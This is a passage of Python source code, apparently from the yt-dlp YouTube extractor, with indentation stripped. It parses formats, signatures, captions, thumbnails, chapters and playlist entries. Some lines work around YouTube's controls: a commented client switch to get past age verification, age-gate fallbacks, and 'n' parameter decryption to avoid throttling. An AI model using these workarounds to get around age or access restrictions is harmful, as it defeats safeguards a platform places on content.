# creator clients can bypass AGE_VERIFICATION_REQUIRED if logged in
if variant == 'embedded' and self._is_unplayable(pr) and self.is_authenticated:
append_client(f'{base_client}_creator')
elif self._is_agegated(pr):
if variant == 'tv_embedded':
append_client(f'{base_client}_embedded')
elif not variant:
append_client(f'tv_embedded.{base_client}', f'{base_client}_embedded')
if last_error:
if not len(prs):
raise last_error
self.report_warning(last_error)
return prs, player_url
def _extract_formats(self, streaming_data, video_id, player_url, is_live, duration):
itags, stream_ids = {}, []
itag_qualities, res_qualities = {}, {}
q = qualities([
# Normally tiny is the smallest video-only formats. But
# audio-only formats with unknown quality may get tagged as tiny
'tiny',
'audio_quality_ultralow', 'audio_quality_low', 'audio_quality_medium', 'audio_quality_high', # Audio only formats
'small', 'medium', 'large', 'hd720', 'hd1080', 'hd1440', 'hd2160', 'hd2880', 'highres'
])
streaming_formats = traverse_obj(streaming_data, (..., ('formats', 'adaptiveFormats'), ...), default=[])
for fmt in streaming_formats:
if fmt.get('targetDurationSec'):
continue
itag = str_or_none(fmt.get('itag'))
audio_track = fmt.get('audioTrack') or {}
stream_id = '%s.%s' % (itag or '', audio_track.get('id', ''))
if stream_id in stream_ids:
continue
quality = fmt.get('quality')
height = int_or_none(fmt.get('height'))
if quality == 'tiny' or not quality:
quality = fmt.get('audioQuality', '').lower() or quality
# The 3gp format (17) in android client has a quality of "small",
# but is actually worse than other formats
if itag == '17':
quality = 'tiny'
if quality:
if itag:
itag_qualities[itag] = quality
if height:
res_qualities[height] = quality
# FORMAT_STREAM_TYPE_OTF(otf=1) requires downloading the init fragment
# (adding `&sq=0` to the URL) and parsing emsg box to determine the
# number of fragment that would subsequently requested with (`&sq=N`)
if fmt.get('type') == 'FORMAT_STREAM_TYPE_OTF':
continue
fmt_url = fmt.get('url')
if not fmt_url:
sc = compat_parse_qs(fmt.get('signatureCipher'))
fmt_url = url_or_none(try_get(sc, lambda x: x['url'][0]))
encrypted_sig = try_get(sc, lambda x: x['s'][0])
if not (sc and fmt_url and encrypted_sig):
continue
if not player_url:
continue
signature = self._decrypt_signature(sc['s'][0], video_id, player_url)
sp = try_get(sc, lambda x: x['sp'][0]) or 'signature'
fmt_url += '&' + sp + '=' + signature
query = parse_qs(fmt_url)
throttled = False
if query.get('n'):
try:
fmt_url = update_url_query(fmt_url, {
'n': self._decrypt_nsig(query['n'][0], video_id, player_url)})
except ExtractorError as e:
self.report_warning(
f'nsig extraction failed: You may experience throttling for some formats\n'
f'n = {query['n'][0]} ; player = {player_url}\n{e}', only_once=True)
throttled = True
if itag:
itags[itag] = 'https'
stream_ids.append(stream_id)
tbr = float_or_none(fmt.get('averageBitrate') or fmt.get('bitrate'), 1000)
language_preference = (
10 if audio_track.get('audioIsDefault') and 10
else -10 if 'descriptive' in (audio_track.get('displayName') or '').lower() and -10
else -1)
# Some formats may have much smaller duration than others (possibly damaged during encoding)
# Eg: 2-nOtRESiUc Ref: https://github.com/yt-dlp/yt-dlp/issues/2823
# Make sure to avoid false positives with small duration differences.
# Eg: __2ABJjxzNo, ySuUZEjARPY
is_damaged = try_get(fmt, lambda x: float(x['approxDurationMs']) / duration < 500)
if is_damaged:
self.report_warning(f'{video_id}: Some formats are possibly damaged. They will be deprioritized', only_once=True)
dct = {
'asr': int_or_none(fmt.get('audioSampleRate')),
'filesize': int_or_none(fmt.get('contentLength')),
'format_id': itag,
'format_note': join_nonempty(
'%s%s' % (audio_track.get('displayName') or '',
' (default)' if language_preference > 0 else ''),
fmt.get('qualityLabel') or quality.replace('audio_quality_', ''),
throttled and 'THROTTLED', is_damaged and 'DAMAGED', delim=', '),
'source_preference': -10 if throttled else -1,
'fps': int_or_none(fmt.get('fps')) or None,
'height': height,
'quality': q(quality),
'has_drm': bool(fmt.get('drmFamilies')),
'tbr': tbr,
'url': fmt_url,
'width': int_or_none(fmt.get('width')),
'language': join_nonempty(audio_track.get('id', '').split('.')[0],
'desc' if language_preference < -1 else ''),
'language_preference': language_preference,
# Strictly de-prioritize damaged and 3gp formats
'preference': -10 if is_damaged else -2 if itag == '17' else None,
}
mime_mobj = re.match(
r'((?:[^/]+)/(?:[^;]+))(?:;\s*codecs="([^"]+)")?', fmt.get('mimeType') or '')
if mime_mobj:
dct['ext'] = mimetype2ext(mime_mobj.group(1))
dct.update(parse_codecs(mime_mobj.group(2)))
no_audio = dct.get('acodec') == 'none'
no_video = dct.get('vcodec') == 'none'
if no_audio:
dct['vbr'] = tbr
if no_video:
dct['abr'] = tbr
if no_audio or no_video:
dct['downloader_options'] = {
# Youtube throttles chunks >~10M
'http_chunk_size': 10485760,
}
if dct.get('ext'):
dct['container'] = dct['ext'] + '_dash'
yield dct
live_from_start = is_live and self.get_param('live_from_start')
skip_manifests = self._configuration_arg('skip')
if not self.get_param('youtube_include_hls_manifest', True):
skip_manifests.append('hls')
get_dash = 'dash' not in skip_manifests and (
not is_live or live_from_start or self._configuration_arg('include_live_dash'))
get_hls = not live_from_start and 'hls' not in skip_manifests
def process_manifest_format(f, proto, itag):
if itag in itags:
if itags[itag] == proto or f'{itag}-{proto}' in itags:
return False
itag = f'{itag}-{proto}'
if itag:
f['format_id'] = itag
itags[itag] = proto
f['quality'] = next((
q(qdict[val])
for val, qdict in ((f.get('format_id', '').split('-')[0], itag_qualities), (f.get('height'), res_qualities))
if val in qdict), -1)
return True
for sd in streaming_data:
hls_manifest_url = get_hls and sd.get('hlsManifestUrl')
if hls_manifest_url:
for f in self._extract_m3u8_formats(hls_manifest_url, video_id, 'mp4', fatal=False):
if process_manifest_format(f, 'hls', self._search_regex(
r'/itag/(\d+)', f['url'], 'itag', default=None)):
yield f
dash_manifest_url = get_dash and sd.get('dashManifestUrl')
if dash_manifest_url:
for f in self._extract_mpd_formats(dash_manifest_url, video_id, fatal=False):
if process_manifest_format(f, 'dash', f['format_id']):
f['filesize'] = int_or_none(self._search_regex(
r'/clen/(\d+)', f.get('fragment_base_url') or f['url'], 'file size', default=None))
if live_from_start:
f['is_from_start'] = True
yield f
def _extract_storyboard(self, player_responses, duration):
spec = get_first(
player_responses, ('storyboards', 'playerStoryboardSpecRenderer', 'spec'), default='').split('|')[::-1]
base_url = url_or_none(urljoin('https://i.ytimg.com/', spec.pop() or None))
if not base_url:
return
L = len(spec) - 1
for i, args in enumerate(spec):
args = args.split('#')
counts = list(map(int_or_none, args[:5]))
if len(args) != 8 or not all(counts):
self.report_warning(f'Malformed storyboard {i}: {'#'.join(args)}{bug_reports_message()}')
continue
width, height, frame_count, cols, rows = counts
N, sigh = args[6:]
url = base_url.replace('$L', str(L - i)).replace('$N', N) + f'&sigh={sigh}'
fragment_count = frame_count / (cols * rows)
fragment_duration = duration / fragment_count
yield {
'format_id': f'sb{i}',
'format_note': 'storyboard',
'ext': 'mhtml',
'protocol': 'mhtml',
'acodec': 'none',
'vcodec': 'none',
'url': url,
'width': width,
'height': height,
'fragments': [{
'url': url.replace('$M', str(j)),
'duration': min(fragment_duration, duration - (j * fragment_duration)),
} for j in range(math.ceil(fragment_count))],
}
def _download_player_responses(self, url, smuggled_data, video_id, webpage_url):
webpage = None
if 'webpage' not in self._configuration_arg('player_skip'):
webpage = self._download_webpage(
webpage_url + '&bpctr=9999999999&has_verified=1', video_id, fatal=False)
master_ytcfg = self.extract_ytcfg(video_id, webpage) or self._get_default_ytcfg()
player_responses, player_url = self._extract_player_responses(
self._get_requested_clients(url, smuggled_data),
video_id, webpage, master_ytcfg)
return webpage, master_ytcfg, player_responses, player_url
def _list_formats(self, video_id, microformats, video_details, player_responses, player_url, duration=None):
live_broadcast_details = traverse_obj(microformats, (..., 'liveBroadcastDetails'))
is_live = get_first(video_details, 'isLive')
if is_live is None:
is_live = get_first(live_broadcast_details, 'isLiveNow')
streaming_data = traverse_obj(player_responses, (..., 'streamingData'), default=[])
formats = list(self._extract_formats(streaming_data, video_id, player_url, is_live, duration))
return live_broadcast_details, is_live, streaming_data, formats
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
video_id = self._match_id(url)
base_url = self.http_scheme() + '//www.youtube.com/'
webpage_url = base_url + 'watch?v=' + video_id
webpage, master_ytcfg, player_responses, player_url = self._download_player_responses(url, smuggled_data, video_id, webpage_url)
playability_statuses = traverse_obj(
player_responses, (..., 'playabilityStatus'), expected_type=dict, default=[])
trailer_video_id = get_first(
playability_statuses,
('errorScreen', 'playerLegacyDesktopYpcTrailerRenderer', 'trailerVideoId'),
expected_type=str)
if trailer_video_id:
return self.url_result(
trailer_video_id, self.ie_key(), trailer_video_id)
search_meta = ((lambda x: self._html_search_meta(x, webpage, default=None))
if webpage else (lambda x: None))
video_details = traverse_obj(
player_responses, (..., 'videoDetails'), expected_type=dict, default=[])
microformats = traverse_obj(
player_responses, (..., 'microformat', 'playerMicroformatRenderer'),
expected_type=dict, default=[])
video_title = (
get_first(video_details, 'title')
or self._get_text(microformats, (..., 'title'))
or search_meta(['og:title', 'twitter:title', 'title']))
video_description = get_first(video_details, 'shortDescription')
multifeed_metadata_list = get_first(
player_responses,
('multicamera', 'playerLegacyMulticameraRenderer', 'metadataList'),
expected_type=str)
if multifeed_metadata_list and not smuggled_data.get('force_singlefeed'):
if self.get_param('noplaylist'):
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
else:
entries = []
feed_ids = []
for feed in multifeed_metadata_list.split(','):
# Unquote should take place before split on comma (,) since textual
# fields may contain comma as well (see
# https://github.com/ytdl-org/youtube-dl/issues/8536)
feed_data = compat_parse_qs(
compat_urllib_parse_unquote_plus(feed))
def feed_entry(name):
return try_get(
feed_data, lambda x: x[name][0], compat_str)
feed_id = feed_entry('id')
if not feed_id:
continue
feed_title = feed_entry('title')
title = video_title
if feed_title:
title += ' (%s)' % feed_title
entries.append({
'_type': 'url_transparent',
'ie_key': 'Youtube',
'url': smuggle_url(
'%swatch?v=%s' % (base_url, feed_data['id'][0]),
{'force_singlefeed': True}),
'title': title,
})
feed_ids.append(feed_id)
self.to_screen(
'Downloading multifeed video (%s) - add --no-playlist to just download video %s'
% (', '.join(feed_ids), video_id))
return self.playlist_result(
entries, video_id, video_title, video_description)
duration = int_or_none(
get_first(video_details, 'lengthSeconds')
or get_first(microformats, 'lengthSeconds')
or parse_duration(search_meta('duration'))) or None
live_broadcast_details, is_live, streaming_data, formats = self._list_formats(
video_id, microformats, video_details, player_responses, player_url, duration)
if not formats:
if not self.get_param('allow_unplayable_formats') and traverse_obj(streaming_data, (..., 'licenseInfos')):
self.report_drm(video_id)
pemr = get_first(
playability_statuses,
('errorScreen', 'playerErrorMessageRenderer'), expected_type=dict) or {}
reason = self._get_text(pemr, 'reason') or get_first(playability_statuses, 'reason')
subreason = clean_html(self._get_text(pemr, 'subreason') or '')
if subreason:
if subreason == 'The uploader has not made this video available in your country.':
countries = get_first(microformats, 'availableCountries')
if not countries:
regions_allowed = search_meta('regionsAllowed')
countries = regions_allowed.split(',') if regions_allowed else None
self.raise_geo_restricted(subreason, countries, metadata_available=True)
reason += f'. {subreason}'
if reason:
self.raise_no_formats(reason, expected=True)
keywords = get_first(video_details, 'keywords', expected_type=list) or []
if not keywords and webpage:
keywords = [
unescapeHTML(m.group('content'))
for m in re.finditer(self._meta_regex('og:video:tag'), webpage)]
for keyword in keywords:
if keyword.startswith('yt:stretch='):
mobj = re.search(r'(\d+)\s*:\s*(\d+)', keyword)
if mobj:
# NB: float is intentional for forcing float division
w, h = (float(v) for v in mobj.groups())
if w > 0 and h > 0:
ratio = w / h
for f in formats:
if f.get('vcodec') != 'none':
f['stretched_ratio'] = ratio
break
thumbnails = self._extract_thumbnails((video_details, microformats), (..., ..., 'thumbnail'))
thumbnail_url = search_meta(['og:image', 'twitter:image'])
if thumbnail_url:
thumbnails.append({
'url': thumbnail_url,
})
original_thumbnails = thumbnails.copy()
# The best resolution thumbnails sometimes does not appear in the webpage
# See: https://github.com/ytdl-org/youtube-dl/issues/29049, https://github.com/yt-dlp/yt-dlp/issues/340
# List of possible thumbnails - Ref: <https://stackoverflow.com/a/20542029>
thumbnail_names = [
'maxresdefault', 'hq720', 'sddefault', 'sd1', 'sd2', 'sd3',
'hqdefault', 'hq1', 'hq2', 'hq3', '0',
'mqdefault', 'mq1', 'mq2', 'mq3',
'default', '1', '2', '3'
]
n_thumbnail_names = len(thumbnail_names)
thumbnails.extend({
'url': 'https://i.ytimg.com/vi{webp}/{video_id}/{name}{live}.{ext}'.format(
video_id=video_id, name=name, ext=ext,
webp='_webp' if ext == 'webp' else '', live='_live' if is_live else ''),
} for name in thumbnail_names for ext in ('webp', 'jpg'))
for thumb in thumbnails:
i = next((i for i, t in enumerate(thumbnail_names) if f'/{video_id}/{t}' in thumb['url']), n_thumbnail_names)
thumb['preference'] = (0 if '.webp' in thumb['url'] else -1) - (2 * i)
self._remove_duplicate_formats(thumbnails)
self._downloader._sort_thumbnails(original_thumbnails)
category = get_first(microformats, 'category') or search_meta('genre')
channel_id = str_or_none(
get_first(video_details, 'channelId')
or get_first(microformats, 'externalChannelId')
or search_meta('channelId'))
owner_profile_url = get_first(microformats, 'ownerProfileUrl')
live_content = get_first(video_details, 'isLiveContent')
is_upcoming = get_first(video_details, 'isUpcoming')
if is_live is None:
if is_upcoming or live_content is False:
is_live = False
if is_upcoming is None and (live_content or is_live):
is_upcoming = False
live_start_time = parse_iso8601(get_first(live_broadcast_details, 'startTimestamp'))
live_end_time = parse_iso8601(get_first(live_broadcast_details, 'endTimestamp'))
if not duration and live_end_time and live_start_time:
duration = live_end_time - live_start_time
if is_live and self.get_param('live_from_start'):
self._prepare_live_from_start_formats(formats, video_id, live_start_time, url, webpage_url, smuggled_data)
formats.extend(self._extract_storyboard(player_responses, duration))
# Source is given priority since formats that throttle are given lower source_preference
# When throttling issue is fully fixed, remove this
self._sort_formats(formats, ('quality', 'res', 'fps', 'hdr:12', 'source', 'codec:vp9.2', 'lang', 'proto'))
info = {
'id': video_id,
'title': video_title,
'formats': formats,
'thumbnails': thumbnails,
# The best thumbnail that we are sure exists. Prevents unnecessary
# URL checking if user don't care about getting the best possible thumbnail
'thumbnail': traverse_obj(original_thumbnails, (-1, 'url')),
'description': video_description,
'uploader': get_first(video_details, 'author'),
'uploader_id': self._search_regex(r'/(?:channel|user)/([^/?&#]+)', owner_profile_url, 'uploader id') if owner_profile_url else None,
'uploader_url': owner_profile_url,
'channel_id': channel_id,
'channel_url': format_field(channel_id, template='https://www.youtube.com/channel/%s'),
'duration': duration,
'view_count': int_or_none(
get_first((video_details, microformats), (..., 'viewCount'))
or search_meta('interactionCount')),
'average_rating': float_or_none(get_first(video_details, 'averageRating')),
'age_limit': 18 if (
get_first(microformats, 'isFamilySafe') is False
or search_meta('isFamilyFriendly') == 'false'
or search_meta('og:restrictions:age') == '18+') else 0,
'webpage_url': webpage_url,
'categories': [category] if category else None,
'tags': keywords,
'playable_in_embed': get_first(playability_statuses, 'playableInEmbed'),
'is_live': is_live,
'was_live': (False if is_live or is_upcoming or live_content is False
else None if is_live is None or is_upcoming is None
else live_content),
'live_status': 'is_upcoming' if is_upcoming else None, # rest will be set by YoutubeDL
'release_timestamp': live_start_time,
}
pctr = traverse_obj(player_responses, (..., 'captions', 'playerCaptionsTracklistRenderer'), expected_type=dict)
if pctr:
def get_lang_code(track):
return (remove_start(track.get('vssId') or '', '.').replace('.', '-')
or track.get('languageCode'))
# Converted into dicts to remove duplicates
captions = {
get_lang_code(sub): sub
for sub in traverse_obj(pctr, (..., 'captionTracks', ...), default=[])}
translation_languages = {
lang.get('languageCode'): self._get_text(lang.get('languageName'), max_runs=1)
for lang in traverse_obj(pctr, (..., 'translationLanguages', ...), default=[])}
def process_language(container, base_url, lang_code, sub_name, query):
lang_subs = container.setdefault(lang_code, [])
for fmt in self._SUBTITLE_FORMATS:
query.update({
'fmt': fmt,
})
lang_subs.append({
'ext': fmt,
'url': urljoin('https://www.youtube.com', update_url_query(base_url, query)),
'name': sub_name,
})
subtitles, automatic_captions = {}, {}
for lang_code, caption_track in captions.items():
base_url = caption_track.get('baseUrl')
orig_lang = parse_qs(base_url).get('lang', [None])[-1]
if not base_url:
continue
lang_name = self._get_text(caption_track, 'name', max_runs=1)
if caption_track.get('kind') != 'asr':
if not lang_code:
continue
process_language(
subtitles, base_url, lang_code, lang_name, {})
if not caption_track.get('isTranslatable'):
continue
for trans_code, trans_name in translation_languages.items():
if not trans_code:
continue
orig_trans_code = trans_code
if caption_track.get('kind') != 'asr':
if 'translated_subs' in self._configuration_arg('skip'):
continue
trans_code += f'-{lang_code}'
trans_name += format_field(lang_name, template=' from %s')
# Add an "-orig" label to the original language so that it can be distinguished.
# The subs are returned without "-orig" as well for compatibility
if lang_code == f'a-{orig_trans_code}':
process_language(
automatic_captions, base_url, f'{trans_code}-orig', f'{trans_name} (Original)', {})
# Setting tlang=lang returns damaged subtitles.
process_language(automatic_captions, base_url, trans_code, trans_name,
{} if orig_lang == orig_trans_code else {'tlang': trans_code})
info['automatic_captions'] = automatic_captions
info['subtitles'] = subtitles
parsed_url = compat_urllib_parse_urlparse(url)
for component in [parsed_url.fragment, parsed_url.query]:
query = compat_parse_qs(component)
for k, v in query.items():
for d_k, s_ks in [('start', ('start', 't')), ('end', ('end',))]:
d_k += '_time'
if d_k not in info and k in s_ks:
info[d_k] = parse_duration(query[k][0])
# Youtube Music Auto-generated description
if video_description:
mobj = re.search(r'(?s)(?P<track>[^·\n]+)·(?P<artist>[^\n]+)\n+(?P<album>[^\n]+)(?:.+?℗\s*(?P<release_year>\d{4})(?!\d))?(?:.+?Released on\s*:\s*(?P<release_date>\d{4}-\d{2}-\d{2}))?(.+?\nArtist\s*:\s*(?P<clean_artist>[^\n]+))?.+\nAuto-generated by YouTube\.\s*$', video_description)
if mobj:
release_year = mobj.group('release_year')
release_date = mobj.group('release_date')
if release_date:
release_date = release_date.replace('-', '')
if not release_year:
release_year = release_date[:4]
info.update({
'album': mobj.group('album'.strip()),
'artist': mobj.group('clean_artist') or ', '.join(a.strip() for a in mobj.group('artist').split('·')),
'track': mobj.group('track').strip(),
'release_date': release_date,
'release_year': int_or_none(release_year),
})
initial_data = None
if webpage:
initial_data = self._extract_yt_initial_variable(
webpage, self._YT_INITIAL_DATA_RE, video_id,
'yt initial data')
if not initial_data:
query = {'videoId': video_id}
query.update(self._get_checkok_params())
initial_data = self._extract_response(
item_id=video_id, ep='next', fatal=False,
ytcfg=master_ytcfg, query=query,
headers=self.generate_api_headers(ytcfg=master_ytcfg),
note='Downloading initial data API JSON')
try:
# This will error if there is no livechat
initial_data['contents']['twoColumnWatchNextResults']['conversationBar']['liveChatRenderer']['continuations'][0]['reloadContinuationData']['continuation']
info.setdefault('subtitles', {})['live_chat'] = [{
'url': 'https://www.youtube.com/watch?v=%s' % video_id, # url is needed to set cookies
'video_id': video_id,
'ext': 'json',
'protocol': 'youtube_live_chat' if is_live or is_upcoming else 'youtube_live_chat_replay',
}]
except (KeyError, IndexError, TypeError):
pass
if initial_data:
info['chapters'] = (
self._extract_chapters_from_json(initial_data, duration)
or self._extract_chapters_from_engagement_panel(initial_data, duration)
or None)
contents = traverse_obj(
initial_data, ('contents', 'twoColumnWatchNextResults', 'results', 'results', 'contents'),
expected_type=list, default=[])
vpir = get_first(contents, 'videoPrimaryInfoRenderer')
if vpir:
stl = vpir.get('superTitleLink')
if stl:
stl = self._get_text(stl)
if try_get(
vpir,
lambda x: x['superTitleIcon']['iconType']) == 'LOCATION_PIN':
info['location'] = stl
else:
mobj = re.search(r'(.+?)\s*S(\d+)\s*•\s*E(\d+)', stl)
if mobj:
info.update({
'series': mobj.group(1),
'season_number': int(mobj.group(2)),
'episode_number': int(mobj.group(3)),
})
for tlb in (try_get(
vpir,
lambda x: x['videoActions']['menuRenderer']['topLevelButtons'],
list) or []):
tbr = tlb.get('toggleButtonRenderer') or {}
for getter, regex in [(
lambda x: x['defaultText']['accessibility']['accessibilityData'],
r'(?P<count>[\d,]+)\s*(?P<type>(?:dis)?like)'), ([
lambda x: x['accessibility'],
lambda x: x['accessibilityData']['accessibilityData'],
], r'(?P<type>(?:dis)?like) this video along with (?P<count>[\d,]+) other people')]:
label = (try_get(tbr, getter, dict) or {}).get('label')
if label:
mobj = re.match(regex, label)
if mobj:
info[mobj.group('type') + '_count'] = str_to_int(mobj.group('count'))
break
sbr_tooltip = try_get(
vpir, lambda x: x['sentimentBar']['sentimentBarRenderer']['tooltip'])
if sbr_tooltip:
like_count, dislike_count = sbr_tooltip.split(' / ')
info.update({
'like_count': str_to_int(like_count),
'dislike_count': str_to_int(dislike_count),
})
vsir = get_first(contents, 'videoSecondaryInfoRenderer')
if vsir:
vor = traverse_obj(vsir, ('owner', 'videoOwnerRenderer'))
info.update({
'channel': self._get_text(vor, 'title'),
'channel_follower_count': self._get_count(vor, 'subscriberCountText')})
rows = try_get(
vsir,
lambda x: x['metadataRowContainer']['metadataRowContainerRenderer']['rows'],
list) or []
multiple_songs = False
for row in rows:
if try_get(row, lambda x: x['metadataRowRenderer']['hasDividerLine']) is True:
multiple_songs = True
break
for row in rows:
mrr = row.get('metadataRowRenderer') or {}
mrr_title = mrr.get('title')
if not mrr_title:
continue
mrr_title = self._get_text(mrr, 'title')
mrr_contents_text = self._get_text(mrr, ('contents', 0))
if mrr_title == 'License':
info['license'] = mrr_contents_text
elif not multiple_songs:
if mrr_title == 'Album':
info['album'] = mrr_contents_text
elif mrr_title == 'Artist':
info['artist'] = mrr_contents_text
elif mrr_title == 'Song':
info['track'] = mrr_contents_text
fallbacks = {
'channel': 'uploader',
'channel_id': 'uploader_id',
'channel_url': 'uploader_url',
}
# The upload date for scheduled, live and past live streams / premieres in microformats
# may be different from the stream date. Although not in UTC, we will prefer it in this case.
# See: https://github.com/yt-dlp/yt-dlp/pull/2223#issuecomment-1008485139
upload_date = (
unified_strdate(get_first(microformats, 'uploadDate'))
or unified_strdate(search_meta('uploadDate')))
if not upload_date or (not info.get('is_live') and not info.get('was_live') and info.get('live_status') != 'is_upcoming'):
upload_date = strftime_or_none(self._extract_time_text(vpir, 'dateText')[0], '%Y%m%d')
info['upload_date'] = upload_date
for to, frm in fallbacks.items():
if not info.get(to):
info[to] = info.get(frm)
for s_k, d_k in [('artist', 'creator'), ('track', 'alt_title')]:
v = info.get(s_k)
if v:
info[d_k] = v
is_private = get_first(video_details, 'isPrivate', expected_type=bool)
is_unlisted = get_first(microformats, 'isUnlisted', expected_type=bool)
is_membersonly = None
is_premium = None
if initial_data and is_private is not None:
is_membersonly = False
is_premium = False
contents = try_get(initial_data, lambda x: x['contents']['twoColumnWatchNextResults']['results']['results']['contents'], list) or []
badge_labels = set()
for content in contents:
if not isinstance(content, dict):
continue
badge_labels.update(self._extract_badges(content.get('videoPrimaryInfoRenderer')))
for badge_label in badge_labels:
if badge_label.lower() == 'members only':
is_membersonly = True
elif badge_label.lower() == 'premium':
is_premium = True
elif badge_label.lower() == 'unlisted':
is_unlisted = True
info['availability'] = self._availability(
is_private=is_private,
needs_premium=is_premium,
needs_subscription=is_membersonly,
needs_auth=info['age_limit'] >= 18,
is_unlisted=None if is_private is None else is_unlisted)
info['__post_extractor'] = self.extract_comments(master_ytcfg, video_id, contents, webpage)
self.mark_watched(video_id, player_responses)
return info
class YoutubeTabBaseInfoExtractor(YoutubeBaseInfoExtractor):
@staticmethod
def passthrough_smuggled_data(func):
def _smuggle(entries, smuggled_data):
for entry in entries:
# TODO: Convert URL to music.youtube instead.
# Do we need to passthrough any other smuggled_data?
entry['url'] = smuggle_url(entry['url'], smuggled_data)
yield entry
@functools.wraps(func)
def wrapper(self, url):
url, smuggled_data = unsmuggle_url(url, {})
if self.is_music_url(url):
smuggled_data['is_music_url'] = True
info_dict = func(self, url, smuggled_data)
if smuggled_data and info_dict.get('entries'):
info_dict['entries'] = _smuggle(info_dict['entries'], smuggled_data)
return info_dict
return wrapper
def _extract_channel_id(self, webpage):
channel_id = self._html_search_meta(
'channelId', webpage, 'channel id', default=None)
if channel_id:
return channel_id
channel_url = self._html_search_meta(
('og:url', 'al:ios:url', 'al:android:url', 'al:web:url',
'twitter:url', 'twitter:app:url:iphone', 'twitter:app:url:ipad',
'twitter:app:url:googleplay'), webpage, 'channel url')
return self._search_regex(
r'https?://(?:www\.)?youtube\.com/channel/([^/?#&])+',
channel_url, 'channel id')
@staticmethod
def _extract_basic_item_renderer(item):
# Modified from _extract_grid_item_renderer
known_basic_renderers = (
'playlistRenderer', 'videoRenderer', 'channelRenderer', 'showRenderer', 'reelItemRenderer'
)
for key, renderer in item.items():
if not isinstance(renderer, dict):
continue
elif key in known_basic_renderers:
return renderer
elif key.startswith('grid') and key.endswith('Renderer'):
return renderer
def _grid_entries(self, grid_renderer):
for item in grid_renderer['items']:
if not isinstance(item, dict):
continue
renderer = self._extract_basic_item_renderer(item)
if not isinstance(renderer, dict):
continue
title = self._get_text(renderer, 'title')
# playlist
playlist_id = renderer.get('playlistId')
if playlist_id:
yield self.url_result(
'https://www.youtube.com/playlist?list=%s' % playlist_id,
ie=YoutubeTabIE.ie_key(), video_id=playlist_id,
video_title=title)
continue
# video
video_id = renderer.get('videoId')
if video_id:
yield self._extract_video(renderer)
continue
# channel
channel_id = renderer.get('channelId')
if channel_id:
yield self.url_result(
'https://www.youtube.com/channel/%s' % channel_id,
ie=YoutubeTabIE.ie_key(), video_title=title)
continue
# generic endpoint URL support
ep_url = urljoin('https://www.youtube.com/', try_get(
renderer, lambda x: x['navigationEndpoint']['commandMetadata']['webCommandMetadata']['url'],
compat_str))
if ep_url:
for ie in (YoutubeTabIE, YoutubePlaylistIE, YoutubeIE):
if ie.suitable(ep_url):
yield self.url_result(
ep_url, ie=ie.ie_key(), video_id=ie._match_id(ep_url), video_title=title)
break
def _music_reponsive_list_entry(self, renderer):
video_id = traverse_obj(renderer, ('playlistItemData', 'videoId'))
if video_id:
return self.url_result(f'https://music.youtube.com/watch?v={video_id}',
ie=YoutubeIE.ie_key(), video_id=video_id)
playlist_id = traverse_obj(renderer, ('navigationEndpoint', 'watchEndpoint', 'playlistId'))
if playlist_id:
video_id = traverse_obj(renderer, ('navigationEndpoint', 'watchEndpoint', 'videoId'))
if video_id:
return self.url_result(f'https://music.youtube.com/watch?v={video_id}&list={playlist_id}',
ie=YoutubeTabIE.ie_key(), video_id=playlist_id)
return self.url_result(f'https://music.youtube.com/playlist?list={playlist_id}',
ie=YoutubeTabIE.ie_key(), video_id=playlist_id)
browse_id = traverse_obj(renderer, ('navigationEndpoint', 'browseEndpoint', 'browseId'))
if browse_id:
return self.url_result(f'https://music.youtube.com/browse/{browse_id}',
ie=YoutubeTabIE.ie_key(), video_id=browse_id)
def _shelf_entries_from_content(self, shelf_renderer):
content = shelf_renderer.get('content')
if not isinstance(content, dict):
return
renderer = content.get('gridRenderer') or content.get('expandedShelfContentsRenderer')
if renderer:
# TODO: add support for nested playlists so each shelf is processed
# as separate playlist
# TODO: this includes only first N items
for entry in self._grid_entries(renderer):
yield entry
renderer = content.get('horizontalListRenderer')
if renderer:
# TODO
pass
def _shelf_entries(self, shelf_renderer, skip_channels=False):
ep = try_get(
shelf_renderer, lambda x: x['endpoint']['commandMetadata']['webCommandMetadata']['url'],
compat_str)
shelf_url = urljoin('https://www.youtube.com', ep)
if shelf_url:
# Skipping links to another channels, note that checking for
# endpoint.commandMetadata.webCommandMetadata.webPageTypwebPageType == WEB_PAGE_TYPE_CHANNEL
# will not work
if skip_channels and '/channels?' in shelf_url:
return
title = self._get_text(shelf_renderer, 'title')
yield self.url_result(shelf_url, video_title=title)
# Shelf may not contain shelf URL, fallback to extraction from content
for entry in self._shelf_entries_from_content(shelf_renderer):
yield entry
def _playlist_entries(self, video_list_renderer):
for content in video_list_renderer['contents']:
if not isinstance(content, dict):
continue
renderer = content.get('playlistVideoRenderer') or content.get('playlistPanelVideoRenderer')
if not isinstance(renderer, dict):
continue
video_id = renderer.get('videoId')
if not video_id:
continue
yield self._extract_video(renderer)
def _rich_entries(self, rich_grid_renderer):
renderer = try_get(
rich_grid_renderer, lambda x: x['content']['videoRenderer'], dict) or {}
video_id = renderer.get('videoId')
if not video_id:
return
yield self._extract_video(renderer)
def _video_entry(self, video_renderer):
video_id = video_renderer.get('videoId')
if video_id:
return self._extract_video(video_renderer)
def _hashtag_tile_entry(self, hashtag_tile_renderer):
url = urljoin('https://youtube.com', traverse_obj(
hashtag_tile_renderer, ('onTapCommand', 'commandMetadata', 'webCommandMetadata', 'url')))
if url:
return self.url_result(
url, ie=YoutubeTabIE.ie_key(), title=self._get_text(hashtag_tile_renderer, 'hashtag'))
def _post_thread_entries(self, post_thread_renderer):
post_renderer = try_get(
post_thread_renderer, lambda x: x['post']['backstagePostRenderer'], dict)
if not post_renderer:
return
# video attachment
video_renderer = try_get(
post_renderer, lambda x: x['backstageAttachment']['videoRenderer'], dict) or {}
video_id = video_renderer.get('videoId')
if video_id:
entry = self._extract_video(video_renderer)
if entry:
yield entry
# playlist attachment
playlist_id = try_get(
post_renderer, lambda x: x['backstageAttachment']['playlistRenderer']['playlistId'], compat_str)
if playlist_id:
yield self.url_result(
'https://www.youtube.com/playlist?list=%s' % playlist_id,
ie=YoutubeTabIE.ie_key(), video_id=playlist_id)
# inline video links
runs = try_get(post_renderer, lambda x: x['contentText']['runs'], list) or []
for run in runs:
if not isinstance(run, dict):
continue
ep_url = try_get(
run, lambda x: x['navigationEndpoint']['urlEndpoint']['url'], compat_str)
if not ep_url:
continue
if not YoutubeIE.suitable(ep_url):
continue
ep_video_id = YoutubeIE._match_id(ep_url)
if video_id == ep_video_id:
continue
yield self.url_result(ep_url, ie=YoutubeIE.ie_key(), video_id=ep_video_id)
def _post_thread_continuation_entries(self, post_thread_continuation):
